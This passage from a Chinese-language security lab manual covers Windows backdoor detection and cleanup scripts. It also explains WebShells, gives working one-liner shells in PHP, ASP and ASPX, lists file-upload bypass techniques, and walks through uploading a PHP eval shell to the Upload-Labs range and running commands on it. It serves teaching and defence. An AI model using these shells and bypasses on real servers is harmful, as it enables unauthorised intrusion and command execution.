Get-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -ErrorAction SilentlyContinue

⚠️ 排查重点:重点关注路径指向 TempAppDataUsers\Public、随机文件名目录,或者名称伪装成系统组件但发布者未知的项目。

第四步:清除可疑启动项

Terminal window
# 1. 删除注册表启动项(示例)
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsUpdateHelper" -ErrorAction SilentlyContinue


# 2. 删除启动文件夹中的可疑文件
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\updater.bat" -Force -ErrorAction SilentlyContinue


# 3. 删除可疑计划任务
schtasks /delete /tn "SystemHealthCheck" /f


# 4. 停止并删除可疑服务
sc.exe stop "SystemDiagnostic"
sc.exe delete "SystemDiagnostic"

第五步:复查验证

Terminal window
# 再次查看注册表启动项
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"


# 再次检查启动文件夹
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -Force


# 再次检查计划任务与自动服务
Get-ScheduledTask | Where-Object {$_.Author -notlike "Microsoft*" -and $_.TaskPath -notlike "\Microsoft*"}
Get-CimInstance Win32_Service | Where-Object {$_.StartMode -eq "Auto"} | Select-Object Name, DisplayName, PathName

🛡️ 防御建议:单一启动方式的排查存在盲区。实际工作中应遵循”注册表 → 启动文件夹 → 计划任务 → 服务”的顺序进行综合检查,以最大程度降低遗漏风险。

实验6:后门全面检测与清除

Section titled “实验6:后门全面检测与清除”

本实验是任务一中最具实战价值的防御实验。系统化的后门检测流程,是安全运维人员必须掌握的核心技能。

第一步:一键检测脚本

Terminal window
# ============================================
# Windows后门全面检测脚本
# 以管理员身份运行PowerShell
# ============================================


Write-Host "`n========== Windows 后门检测报告 ==========" -ForegroundColor Cyan
Write-Host "检测时间: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')" -ForegroundColor Gray
Write-Host "计算机名: $env:COMPUTERNAME" -ForegroundColor Gray


# 1. 检查注册表启动项
Write-Host "`n[1/7] 检查注册表自启动项..." -ForegroundColor Yellow
$regPaths = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
)
foreach ($path in $regPaths) {
    if (Test-Path $path) {
        $props = Get-ItemProperty -Path $path
        $props.PSObject.Properties | Where-Object {$_.Name -notlike "PS*"} | ForEach-Object {
            Write-Host "  [$path] $($_.Name) = $($_.Value)" -ForegroundColor White
        }
    }
}


# 2. 检查非标准服务
Write-Host "`n[2/7] 检查可疑系统服务..." -ForegroundColor Yellow
Get-WmiObject Win32_Service | Where-Object {
    $_.PathName -notlike "*System32*" -and
    $_.PathName -notlike "*SysWOW64*" -and
    $_.PathName -notlike "*Program Files*" -and
    $_.PathName -notlike "*Windows\Microsoft.NET*" -and
    $_.StartMode -eq "Auto"
} | Select-Object Name, DisplayName, PathName, StartMode | Format-Table -AutoSize


# 3. 检查非Microsoft计划任务
Write-Host "`n[3/7] 检查可疑计划任务..." -ForegroundColor Yellow
Get-ScheduledTask | Where-Object {
    $_.Author -notlike "Microsoft*" -and
    $_.Author -notlike "*Adobe*" -and
    $_.Author -ne $null -and
    $_.State -ne "Disabled"
} | Select-Object TaskName, TaskPath, State, @{N="Author";E={$_.Author}} | Format-Table -AutoSize


# 4. 检查WMI事件订阅
Write-Host "`n[4/7] 检查WMI事件订阅..." -ForegroundColor Yellow
$filters = Get-WmiObject -Namespace "root\subscription" -Class __EventFilter -ErrorAction SilentlyContinue
$consumers = Get-WmiObject -Namespace "root\subscription" -Class CommandLineEventConsumer -ErrorAction SilentlyContinue
$bindings = Get-WmiObject -Namespace "root\subscription" -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue
if ($filters) { Write-Host "  发现事件过滤器:" -ForegroundColor Red; $filters | Format-List Name, Query }
if ($consumers) { Write-Host "  发现命令行消费者:" -ForegroundColor Red; $consumers | Format-List Name, CommandLineTemplate }
if ($bindings) { Write-Host "  发现绑定关系:" -ForegroundColor Red; $bindings | Format-List }


# 5. 检查sethc.exe等辅助功能是否被替换
Write-Host "`n[5/7] 检查辅助功能文件完整性..." -ForegroundColor Yellow
$systemFiles = @("sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe", "displayswitch.exe")
foreach ($file in $systemFiles) {
    $fullPath = "C:\Windows\System32\$file"
    if (Test-Path $fullPath) {
        $hash = (Get-FileHash $fullPath -Algorithm SHA256).Hash
        Write-Host "  $file : $hash" -ForegroundColor White
    }
}
# 注意:需要与已知正常哈希对比才能判断是否被篡改


# 6. 检查可疑网络连接
Write-Host "`n[6/7] 检查可疑网络连接..." -ForegroundColor Yellow
Get-NetTCPConnection -State Established | Where-Object {
    $_.RemoteAddress -notlike "127.0.0.1" -and
    $_.RemoteAddress -notlike "::1" -and
    $_.RemoteAddress -notlike "0.0.0.0"
} | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort,
    @{N="Process";E={(Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name}} |
    Sort-Object RemoteAddress | Format-Table -AutoSize


# 7. 检查可疑进程
Write-Host "`n[7/7] 检查可疑进程..." -ForegroundColor Yellow
Get-Process | Where-Object {
    $_.Path -and (
        $_.Path -like "*Temp*" -or
        $_.Path -like "*AppData*" -or
        $_.Path -like "*Users\Public*"
    )
} | Select-Object Name, Id, Path, StartTime | Format-Table -AutoSize


Write-Host "`n========== 检测完成 ==========" -ForegroundColor Cyan

第二步:一键清除脚本(根据检测结果选择性执行)

Terminal window
# ============================================
# Windows后门一键清除脚本
# 以管理员身份运行PowerShell
# ============================================


Write-Host "开始清除后门..." -ForegroundColor Red


# 1. 清除注册表后门(根据检测结果修改键名)
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsUpdateHelper" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "SystemHealthMonitor" -ErrorAction SilentlyContinue


# 2. 清除计划任务后门
schtasks /delete /tn "SystemHealthCheck" /f 2>$null
schtasks /delete /tn "DiskCleanupTask" /f 2>$null
schtasks /delete /tn "UserProfileSync" /f 2>$null


# 3. 清除服务后门
sc.exe stop "SystemDiagnostic" 2>$null
sc.exe delete "SystemDiagnostic" 2>$null


# 4. 恢复sethc.exe
if (Test-Path "C:\Windows\System32\sethc.exe.bak") {
    Copy-Item "C:\Windows\System32\sethc.exe.bak" "C:\Windows\System32\sethc.exe" -Force
    icacls "C:\Windows\System32\sethc.exe" /reset
    Write-Host "sethc.exe 已恢复" -ForegroundColor Green
}


# 5. 清除WMI事件订阅
Get-WmiObject -Namespace "root\subscription" -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue | Remove-WmiObject -ErrorAction SilentlyContinue
Get-WmiObject -Namespace "root\subscription" -Class CommandLineEventConsumer -ErrorAction SilentlyContinue | Remove-WmiObject -ErrorAction SilentlyContinue
Get-WmiObject -Namespace "root\subscription" -Class __EventFilter -ErrorAction SilentlyContinue | Remove-WmiObject -ErrorAction SilentlyContinue
Write-Host "WMI事件订阅已清除" -ForegroundColor Green


# 6. 删除恶意文件
Remove-Item "C:\Windows\Temp\backdoor*" -Force -ErrorAction SilentlyContinue
Remove-Item "C:\Windows\Temp\malware*" -Force -ErrorAction SilentlyContinue
Remove-Item "C:\Windows\Temp\svchost_update*" -Force -ErrorAction SilentlyContinue


Write-Host "`n后门清除完成!请重新运行检测脚本验证。" -ForegroundColor Green

各类持久化技术对比总结

Section titled “各类持久化技术对比总结”
技术触发方式权限级别检测难度持久性检测方法
注册表Run键用户登录当前用户⭐⭐注册表扫描
计划任务定时/启动/登录可配置SYSTEM⭐⭐Get-ScheduledTask
系统服务系统启动SYSTEM⭐⭐非常高Get-Service
WMI事件订阅事件触发SYSTEM⭐⭐⭐⭐非常高WMI命名空间查询
DLL劫持程序启动继承父进程⭐⭐⭐Process Monitor
粘滞键替换登录界面按键SYSTEM文件哈希对比

📝 任务一知识点总结

Section titled “📝 任务一知识点总结”

本任务核心:任务一聚焦于操作系统层面的持久化机制;任务二将视角转向 Web 应用层面——剖析 WebShell 这一最常见的 Web 服务器入侵手段,并系统讲解从文件上传漏洞利用、WebShell 连接控制到检测与防护加固的完整攻防过程。

知识点要点
后门的本质绕过正常认证的秘密访问通道,核心目的是持久化
注册表后门Run键在用户登录时自动执行,最容易检测也最容易实现
服务后门以SYSTEM权限开机自运行,通过sc命令创建,需重点排查非标准服务
计划任务后门灵活的触发机制(定时/启动/登录/事件),使用Get-ScheduledTask检测
WMI后门最高级的持久化技术,无文件落地,极难检测,需查询WMI命名空间
粘滞键后门利用登录界面辅助功能,替换System32下的关键程序
检测原则多维度排查——注册表+服务+计划任务+WMI+网络连接+进程+文件哈希
防御原则最小权限+应用白名单+EDR+日志审计+定期安全扫描

任务二 WebShell上传和连接

Section titled “任务二 WebShell上传和连接”

🧠 理论知识

Section titled “🧠 理论知识”

木马(Trojan)的分类

Section titled “木马(Trojan)的分类”

木马(Trojan Horse)是一类伪装成合法或可信软件、依赖用户主动安装而完成投放的恶意程序。其名称源于古希腊神话中特洛伊木马的典故——外形为礼物,内部隐藏士兵。木马与病毒、蠕虫的根本区别在于:木马不具备自我复制能力,其传播完全依赖社会工程学手段(如钓鱼、捆绑、伪装下载)诱骗受害者执行。

类型说明典型代表
远控木马(RAT)全功能远程控制,屏幕监控、文件管理、命令执行Cobalt Strike、Metasploit、Gh0st
信息窃取木马(Stealer)窃取浏览器密码、Cookie、加密货币钱包RedLine、Raccoon
键盘记录器(Keylogger)记录键盘输入,获取账号密码软件型/硬件型
后门木马(Backdoor)维持对系统的持久访问与任务一的后门技术配合使用
下载者(Downloader)体积小,功能仅为下载并执行其他恶意软件常作为攻击链的第一阶段
勒索木马(Ransomware)加密文件勒索赎金WannaCry、LockBit
挖矿木马(Cryptominer)占用系统资源进行加密货币挖矿常见于服务器入侵后

WebShell深度解析

Section titled “WebShell深度解析”

什么是WebShell?

Section titled “什么是WebShell?”

WebShell 是以网页脚本形式存在于Web服务器上的恶意程序。攻击者通过浏览器向WebShell发送HTTP请求,WebShell接收参数并在服务器上执行,将结果通过HTTP响应返回给攻击者。

WebShell的工作原理:


攻击者浏览器
    
    │  HTTP POST请求
    │  URL: http://target/uploads/shell.php
    │  Body: cmd=whoami
    
    
Web服务器(IIS/Apache/Nginx)
    
    │  解析PHP/ASP/ASPX脚本
    
    
WebShell脚本执行
    
    │  @eval($_POST['cmd'])
    │  → 执行系统命令: whoami
    
    
返回命令执行结果(HTML格式)


    │  HTTP 200 响应
    │  Body: <pre>nt authority\iusr</pre>
    
    
攻击者浏览器显示结果

WebShell的分类详解

Section titled “WebShell的分类详解”

对 WebShell 的分类需要从多个维度考察,单一维度的划分容易造成概念混淆。常见且严谨的分类维度有以下三种。

维度一:按代码体积与功能完备度划分

类型代码量功能特征典型用途
一句话木马(One-liner)通常 1 行仅含一个 eval 类调用,接收外部参数并执行体积最小,作为最初的滩头阵地;后续操作依赖客户端工具(菜刀/蚁剑/冰蝎等)
小马(上传马)数十行简易文件上传、目录浏览、基础命令执行一句话木马上传成功后,再上传小马以建立可视化上传通道,进而部署大马
大马(管理马)数百~数千行完整的文件管理、命令执行、数据库操作、端口扫描、提权、反弹 Shell 等自带管理后台 UI 的”WebShell 控制台”,可独立使用

💡 三者并非完全并列:从实现方式看,一句话木马可视为小马的极简形态。攻击实战中三者常配合使用——一句话木马 → 上传小马 → 上传大马,形成由简到繁、由小到大的阶梯式部署。

维度二:按通信特征划分(直接影响检测难度)

类型通信特征代表实现静态检测难度流量检测难度
明文 WebShell请求/响应为明文,函数特征显著经典一句话木马、菜刀适用木马⭐(易,特征字明显)⭐(易,POST 体含 evalbase64_decode
变形/免杀 WebShell通过变量函数、字符串拼接、编码混淆规避特征匹配各类”过狗""过D盾”变种⭐⭐⭐(中难)⭐⭐(依赖行为分析)
加密 WebShell请求/响应通过 AES、自定义算法等加密冰蝎(Behinder)、哥斯拉(Godzilla)⭐⭐⭐⭐(难,无法静态判断)⭐⭐⭐⭐(需基于流量行为、熵值分析)
内存马(无文件 WebShell)不落地为文件,驻留于 Web 容器进程内存中Servlet/Filter 型、Tomcat Valve 型、IIS 模块型⭐⭐⭐⭐⭐(无文件可扫)⭐⭐⭐⭐⭐(仅能从内存与请求逻辑发现)

⚠️ 常见误区:很多教材把”代码越短越难检测”作为评级依据。事实并非如此——经典明文一句话木马尽管只有一行,但 eval$_POST 等关键字过于显眼,反而是 D 盾、河马等静态扫描工具最先识别的目标。决定检测难度的根本因素是 是否经过免杀变形、是否加密、是否落盘,而非代码长短。

维度三:按服务端语言划分

语言适用环境典型扩展名关键执行函数
PHPApache + PHP / Nginx + PHP-FPM / IIS + PHP.php.phtml.php5evalassertsystemexecshell_execpassthru
ASP(经典)IIS + ASP(已淘汰但部分老系统仍存在).asp.asa.cerExecuteEvalCreateObject("WScript.Shell")
ASP.NETIIS + .NET Framework / .NET.aspx.ashxEval(JScript)、Process.StartAssembly.Load
JSPTomcat、JBoss、WebLogic 等 Java 容器.jsp.jspxRuntime.execProcessBuilder

💡 语言适配的必要性:WebShell 必须与目标服务端环境匹配——PHP 木马放到纯 IIS+ASP.NET 环境只会被作为静态文本返回。攻击者通常先通过响应头、扩展名、报错信息等进行指纹识别,再选用对应语言的木马。

各语言一句话木马示例

<!-- PHP 一句话木马 -->
<?php @eval($_POST['cmd']);?>
<!-- @符号抑制错误信息输出 -->
<!-- $_POST['cmd'] 接收POST参数cmd的值 -->
<!-- eval() 将字符串作为PHP代码执行 -->
<!-- ASP 一句话木马 -->
<%execute(request("cmd"))%>
<!-- request("cmd") 接收请求参数cmd -->
<!-- execute() 将字符串作为VBScript代码执行 -->
<!-- ASPX 一句话木马(Jscript版) -->
<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>

💡 eval 是 WebShell 的核心机制:所有一句话木马的实现都建立在 eval(或 assertsystemexec 等同类函数)之上——它们能将运行时收到的字符串作为代码执行。攻击者通过 HTTP 请求传入待执行的命令,服务端 eval 调用后将结果回写。这也解释了为何安全检测工具会重点扫描代码中的 evalassertbase64_decode 等高危函数。

WebShell管理工具

Section titled “WebShell管理工具”
工具通信方式特点检测难度
中国菜刀(China Chopper)明文POST经典工具,特征明显,已被杀软广泛识别⭐(易)
冰蝎(Behinder)AES加密通信流量加密,每次连接密钥随机,绕过IDS/WAF⭐⭐⭐(难)
哥斯拉(Godzilla)自定义加密算法支持多种加密方式,高度可定制⭐⭐⭐⭐(很难)
蚁剑(AntSword)明文/加密开源,插件丰富,社区活跃⭐⭐(中)
Weevely加密通信Python编写,Kali内置,针对PHP⭐⭐⭐(难)

菜刀连接WebShell的通信过程(以PHP一句话木马为例):

中国菜刀 → 目标服务器


POST /uploads/shell.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded


cmd=@eval(base64_decode($_POST[action]));&action=ZWNobyAiSGVsbG8iOw==


响应:
HTTP/1.1 200 OK
Hello

🔍 检测线索:菜刀的POST请求体特征明显(包含evalbase64_decode等关键字),WAF和IDS可以通过这些特征进行检测。但冰蝎和哥斯拉使用加密通信,传统特征检测失效,需要基于流量行为分析(如请求/响应大小异常、固定周期通信等)。

WebShell 部署的主要途径——文件上传漏洞

Section titled “WebShell 部署的主要途径——文件上传漏洞”

文件上传漏洞是攻击者投放 WebShell 最常见的渠道。其完整利用链包含从漏洞探测到服务器完全沦陷的四个阶段:

文件上传漏洞利用链:


┌─────────────────────────────────────────────────────────┐
│ 第一阶段:发现上传点                                      │
│ • 目录扫描发现 upload.php、admin/upload.html 等           │
│ • 查看前端源码中的文件上传表单                             │
│ • 测试API接口的文件上传功能                                │
└───────────────────────┬─────────────────────────────────┘
                        
┌─────────────────────────────────────────────────────────┐
│ 第二阶段:绕过前端验证                                    │
│ • 删除JavaScript验证代码(浏览器F12)                     │
│ • 禁用JavaScript                                         │
│ • 使用Burp Suite拦截并修改请求                            │
│ • 直接构造POST请求,跳过前端                              │
└───────────────────────┬─────────────────────────────────┘
                        
┌─────────────────────────────────────────────────────────┐
│ 第三阶段:绕过后端验证                                    │
│                                                         │
│ Content-Type验证    → 修改Content-Type为image/jpeg       │
│ 扩展名黑名单        → 使用.php5、.phtml、.asa等           │
│ 扩展名大小写        → .PhP、.pHp(部分系统区分大小写)    │
│ 双写绕过            → .pphphp → 去除中间php后变.php      │
│ 00截断              → shell.php%00.jpg(老版本PHP)       │
│ 图片马              → 在图片文件中嵌入PHP代码              │
│ .htaccess覆盖       → 上传.htaccess修改解析规则           │
│ 竞争条件            → 在文件被删除前快速访问执行           │
│ IIS解析漏洞         → shell.asp;.jpg(IIS6.0特性)       │
└───────────────────────┬─────────────────────────────────┘
                        
┌─────────────────────────────────────────────────────────┐
│ 第四阶段:利用WebShell                                    │
│ • 访问上传后的WebShell URL                                │
│ • 使用菜刀/冰蝎/哥斯拉连接                                │
│ • 执行系统命令、管理文件、连接数据库                       │
│ • 提权、横向移动、数据窃取                                │
└─────────────────────────────────────────────────────────┘

后端验证绕过方式对照表

验证方式绕过方法原理
Content-Type检查修改为image/jpeg只检查MIME类型,不检查文件内容
文件扩展名黑名单使用php5phtmlasa黑名单不完整,遗漏了可执行扩展名
扩展名大小写.PhP.PhpWindows不区分大小写,Linux区分
文件头检查(图片马)在GIF89a头后嵌入PHP代码检查文件头字节但不检查全部内容
重命名上传文件双写绕过、00截断过滤逻辑存在缺陷

WebShell检测与防御

Section titled “WebShell检测与防御”

WebShell的检测方法

Section titled “WebShell的检测方法”
方法工具/技术说明
文件特征扫描D盾、河马WebShell查杀、ClamAV基于代码特征(eval、base64等关键字)匹配
文件哈希比对MD5/SHA256校验与已知WebShell哈希数据库对比
文件内容分析人工审查+自动化脚本分析文件中的高风险函数调用
流量分析WAF、IDS/IPS检测异常HTTP请求模式(如固定POST到.aspx)
行为检测EDR、RASP监控Web进程的异常行为(如cmd.exe子进程)
文件完整性监控FIM工具监控Web目录文件变更

WebShell防御体系

Section titled “WebShell防御体系”
WebShell防御四层体系:


第一层:预防(事前)
├── 上传目录禁止脚本执行权限(最关键!)
├── 文件上传白名单验证(仅允许图片/文档等安全类型)
├── 上传文件重命名(随机化文件名)
├── 限制上传文件大小
└── Content-Type + 文件头 + 扩展名多重验证


第二层:检测(事中)
├── WAF实时检测异常请求
├── RASP监控Web进程行为
└── IDS/IPS检测已知WebShell通信特征


第三层:响应(事后)
├── 定期扫描Web目录(D盾/河马)
├── 文件完整性监控(新文件告警)
├── 分析Web访问日志(异常POST请求)
└── 分析系统日志(Web进程启动cmd等异常)


第四层:恢复
├── 清除WebShell文件
├── 修复上传漏洞
├── 审查后门和持久化
└── 加固Web服务器配置

🛠️ 实践操作

Section titled “🛠️ 实践操作”

实验7:安装phpStudy并配置Upload-Labs靶场

Section titled “实验7:安装phpStudy并配置Upload-Labs靶场”

phpStudy 是集成 Apache/Nginx、PHP、MySQL 的 Windows 一体化运行环境,能够大幅降低 PHP 环境的搭建成本,适合用于教学与安全靶场部署。

操作步骤

第一步:安装phpStudy

  1. 双击 PhpStudy2018 安装包,按提示完成安装
  2. 安装完成后,双击 phpStudy.exe 启动控制面板
  3. 在控制面板中点击”启动”按钮,等待Apache和MySQL状态变为绿色”运行中”
  4. 验证:打开浏览器访问 http://localhost/,显示phpStudy默认欢迎页面

⚠️ 预期结果:浏览器显示phpStudy默认欢迎页面。如果显示”无法访问此网站”,检查:(1)Apache是否启动成功;(2)80端口是否被IIS或其他程序占用(netstat -ano | findstr :80)。如果80端口被IIS占用,需先在”服务器管理器”中停止IIS,或在phpStudy中将Apache端口改为8080。

第二步:确认PHP版本

phpStudy 2018 默认集成 PHP 5.3.29,该版本已满足 Upload-Labs 绝大多数关卡的需求,无需额外切换版本。

💡 PHP 5.3.29 的优势:Upload-Labs 的 Pass-11/12(00 截断漏洞)需 PHP < 5.3.4 才能复现。PHP 5.3.29 低于此阈值,可以完整复现所有关卡,这是本环境相比高版本 PHP 的教学优势。

第三步:部署Upload-Labs靶场

Terminal window
# Upload-Labs项目地址:https://github.com/c0ny1/upload-labs
# 桌面已提供 upload-labs.zip 文件


# 1. 确认网站根目录位置
ls C:\phpStudy\PHPTutorial\WWW\


# 2. 将桌面的 upload-labs.zip 解压到网站根目录
# 解压后最终目录结构应为:C:\phpStudy\PHPTutorial\WWW\upload-labs\index.php


# 也可以通过命令行解压:
Expand-Archive -Path "$env:USERPROFILE\Desktop\upload-labs.zip" -DestinationPath "C:\phpStudy\PHPTutorial\WWW\" -Force

第四步:验证靶场部署成功

  1. 打开浏览器访问:http://localhost/upload-labs/
  2. 应看到Upload-Labs首页,显示”upload-labs”标题和关卡列表(Pass-01 ~ Pass-21)
  3. 逐一点击各关卡验证:Pass-01 至 Pass-21 均应显示文件上传表单(不应出现404)

⚠️ 预期结果:看到Upload-Labs的关卡选择界面。如果显示空白页或PHP源码,说明PHP未正确配置;如果显示404,检查目录路径是否正确或是否缺少 index.php 文件。

第五步:创建上传目录并设置权限

Terminal window
# Upload-Labs需要upload目录有写入权限
# 检查upload目录是否存在
ls C:\phpStudy\PHPTutorial\WWW\upload-labs\upload\


# 如果不存在则创建
mkdir C:\phpStudy\PHPTutorial\WWW\upload-labs\upload


# 确保Web服务有写入权限(phpStudy环境通常已自动配置)

第六步:了解关卡结构

Upload-Labs包含21个不同难度的关卡,涵盖所有常见的文件上传验证绕过技术:

关卡验证类型绕过方法
Pass-01前端JavaScript验证禁用JS或Burp Suite拦截修改
Pass-02Content-Type验证修改Content-Type为image/jpeg
Pass-03扩展名黑名单(不完整)使用.php5、.phtml等
Pass-04.htaccess覆盖上传.htaccess文件
Pass-05大小写绕过使用.PhP扩展名
Pass-06空格绕过文件名末尾加空格
Pass-07点号绕过文件名末尾加点
Pass-08::$DATA绕过Windows NTFS特性
Pass-09点+空格组合绕过多次组合
Pass-10双写绕过.pphphp
Pass-11-1200截断%00截断(GET/POST),需PHP < 5.3.4
Pass-13-16文件头/图片马图片文件嵌入PHP代码,配合include.php文件包含漏洞
Pass-17-21条件竞争等高级技术race condition

实验8:上传WebShell(以Pass-01为例)

Section titled “实验8:上传WebShell(以Pass-01为例)”

⚠️ 前置条件:本实验需要先完成实验7,确保phpStudy已启动且Upload-Labs可正常访问。同时需要安装Burp Suite Community Edition(免费版即可)。

场景说明:Pass-01 关卡采用前端 JavaScript 校验,仅允许图片类型扩展名上传。本实验目标是绕过该校验,成功上传 PHP 一句话木马并验证其可执行性。

操作步骤

第一步:准备一句话木马

// 保存为 shell.php
<?php @eval($_POST['cmd']);?>

第二步:绕过前端验证(方法一:Burp Suite拦截修改)

💡 Burp Suite 简介:Burp Suite 是 Web 安全测试的事实标准工具,由 PortSwigger 公司开发。社区版(Community Edition)免费,支持代理拦截、请求重放等功能,完全满足教学需求。下载地址:https://portswigger.net/burp/communitydownload,自带 Java 运行环境,无需额外安装 JRE。

① 启动 Burp Suite

  1. 打开 Burp Suite,依次选择 Temporary projectUse Burp defaultsStart Burp
  2. 进入主界面后,顶部菜单选择 ProxyOptions,确认监听器为 127.0.0.1:8080(默认已有)

② 配置浏览器代理

Burp Suite 的工作原理是充当浏览器与服务器之间的代理。浏览器发出的所有请求先经过 Burp,由 Burp 转发给服务器,从而实现请求的拦截与修改。

正常流程:  浏览器 ────────→ Web服务器


使用Burp:  浏览器 ──→ Burp Suite ──→ Web服务器
                    代理拦截      转发请求

Chrome 浏览器设置代理:

  1. 地址栏输入 chrome://settings/ → 搜索”代理” → 点击”打开您计算机的代理设置”
  2. 或直接:设置 → 系统 → 打开计算机的代理设置
  3. 手动设置代理服务器:
    • 地址:127.0.0.1
    • 端口:8080
  4. 保存

⚠️ 重要提示:配置代理后,Chrome 所有网页请求都经过 Burp。实验结束后务必取消代理设置,否则无法正常上网。

③ 准备一句话木马文件并重命名

将上一步创建的 shell.php 重命名为 shell.jpg,用于通过前端 JS 验证。此时文件内容仍然是 PHP 代码,只是扩展名伪装为图片:

shell.jpg(实际内容):<?php @eval($_POST['cmd']);?>

④ 开启 Burp 拦截并上传

  1. 在 Burp Suite 中点击 ProxyIntercept → 确认按钮显示 Intercept is on(拦截已开启)
  2. 浏览器访问靶机 Upload-Labs:http://靶机IP/upload-labs/
  3. 点击 Pass-01
  4. 选择 shell.jpg,点击”上传”
  5. 此时浏览器会卡住不动——这说明 Burp 已成功拦截请求

⑤ 修改被拦截的请求

Burp Suite 的 Intercept 窗口中会显示拦截到的 HTTP 请求。在请求体中找到 filename="shell.jpg" 这一行,将文件名改为 shell.php

# 修改前:
Content-Disposition: form-data; name="upload_file"; filename="shell.jpg"


# 修改后:
Content-Disposition: form-data; name="upload_file"; filename="shell.php"

不要修改请求的其他部分,只改 filename 的值。

⑥ 放行请求

点击 Burp 上方的 Forward 按钮,将修改后的请求转发给服务器。浏览器恢复正常,页面显示”上传成功”并显示文件路径。

⑦ 关闭拦截(实验结束后)

  1. Burp 中点击 Intercept is on 切换为 Intercept is off
  2. 取消浏览器代理设置(否则无法正常上网)

第二步:绕过前端验证(方法二:浏览器禁用JavaScript,无需Burp Suite)

  1. 在Chrome浏览器中按 F12 打开开发者工具
  2. Ctrl+Shift+P 打开命令面板,输入 javascript,选择”Disable JavaScript”
  3. 刷新Upload-Labs Pass-01页面(此时前端JS验证已失效)
  4. 直接选择 shell.php 文件上传
  5. 上传成功后,记得重新启用JavaScript(同样方法选择”Enable JavaScript”)

第三步:验证WebShell上传成功

Terminal window
# 在浏览器中直接访问WebShell(或使用curl)
curl http://localhost/upload-labs/upload/shell.php


# 如果返回空白页面(无报错),说明PHP代码已成功执行
# 通过POST参数执行命令
curl -d "cmd=system('whoami');" http://localhost/upload-labs/upload/shell.php
curl -d "cmd=system('ipconfig');" http://localhost/upload-labs/upload/shell.php
curl -d "cmd=system('net user');" http://localhost/upload-labs/upload/shell.php

⚠️ 预期结果

  • 第一条curl返回空白(PHP执行了eval但没有输出内容)
  • whoami 应返回Web服务运行的用户身份(如 nt authority\systemdesktop-xxx\administrator
  • ipconfig 应返回靶机的网络配置信息
  • net user 应返回靶机上所有用户账户列表

如果返回404,说明上传路径不对,检查Upload-Labs的upload目录位置;如果返回PHP源码文本,说明PHP未正确解析。

💡 前端验证不可作为安全防线:前端 JavaScript 完全在用户浏览器中执行,用户可任意修改、禁用或绕过相关逻辑。因此所有安全校验必须在服务端独立实施,前端校验仅承担提升交互体验的作用(如即时反馈),不能用作安全屏障。

🛡️ 最简单有效的防御:在 phpStudy 环境中,对上传目录(如 upload)通过 Apache 的 .htaccess 文件禁止 PHP 脚本执行。在上传目录下创建 .htaccess 文件,写入 <FilesMatch "\.php$"> Require all denied </FilesMatch>,即可从根本上阻断 WebShell 的利用——即使攻击者成功上传了 shell.php 文件,Apache 也会拒绝执行,只会返回 403 错误。定期使用 D 盾(免费工具)扫描 Web 目录,它能识别绝大多数已知 WebShell 特征。

实验9:利用蚁剑连接WebShell

Section titled “实验9:利用蚁剑连接WebShell”

⚠️ 前置条件:本实验需要先完成实验7(phpStudy + Upload-Labs部署)和实验8(成功上传一句话木马 shell.php)。

蚁剑(AntSword)简介

Section titled “蚁剑(AntSword)简介”

蚁剑是一款开源的 WebShell 管理工具,支持 PHP、ASP、ASPX、JSP 等多种语言,具有丰富的插件生态和活跃的社区。相比已被安全工具广泛识别的”中国菜刀”,蚁剑支持自定义编码器和加密通信,且仍在持续更新维护,是当前教学与安全研究中更合适的 WebShell 管理工具。

对比项中国菜刀(已停更)蚁剑(AntSword)
开源否,闭源是,GitHub 开源
更新维护已停止更新持续维护
编码器/加密仅 Base64支持多种编码器和自定义加密
插件系统丰富的插件生态
流量特征特征明显,易被WAF拦截支持编码器混淆,特征更隐蔽
现代防护检测已被主流杀软/IDS广泛识别持续更新对抗检测

操作步骤

Section titled “操作步骤”

第一步:安装蚁剑

  1. 从蚁剑官方 GitHub 仓库下载最新版本的安装包(Windows 版本为 .zip 格式)
  2. 解压到任意目录(如 C:\Tools\AntSword\
  3. 双击 AntSword.exe 启动
  4. 首次启动会提示初始化,选择”初始化”并指定一个数据存储目录(如 C:\Tools\AntSword\data\

💡 环境要求:蚁剑基于 Electron 开发,自带 Node.js 运行时,无需额外安装依赖。Windows Server 环境下如提示缺少 Visual C++ 运行库,需先安装 vc_redist.x64.exe

第二步:添加WebShell目标

  1. 启动蚁剑后,主界面为空的管理面板
  2. 右键空白区域 → 添加数据
  3. 在弹出的配置窗口中填写:
    • URL地址http://localhost/upload-labs/upload/shell.php
    • 连接密码cmd(对应一句话木马中的 $_POST['cmd'] 参数名)
    • 备注Upload-Labs实验环境(可选)
  4. 编码器设置(可选):点击”编码器”下拉框,选择 chrbase64。默认使用 base64 编码器,即对传输的命令进行 Base64 编码,这是最基本的混淆方式
  5. 点击 添加 按钮保存配置

⚠️ 参数说明

  • URL 地址必须指向实验8中成功上传的 shell.php 文件路径
  • 连接密码必须与一句话木马中的参数名一致。本实验的木马代码为 <?php @eval($_POST['cmd']);?>,参数名为 cmd,因此密码填写 cmd
  • 如果 phpStudy 中 Apache 的端口被改为 8080,URL 应改为 http://localhost:8080/upload-labs/upload/shell.php

第三步:测试连接

  1. 在主面板中,右键刚添加的目标 → 文件管理
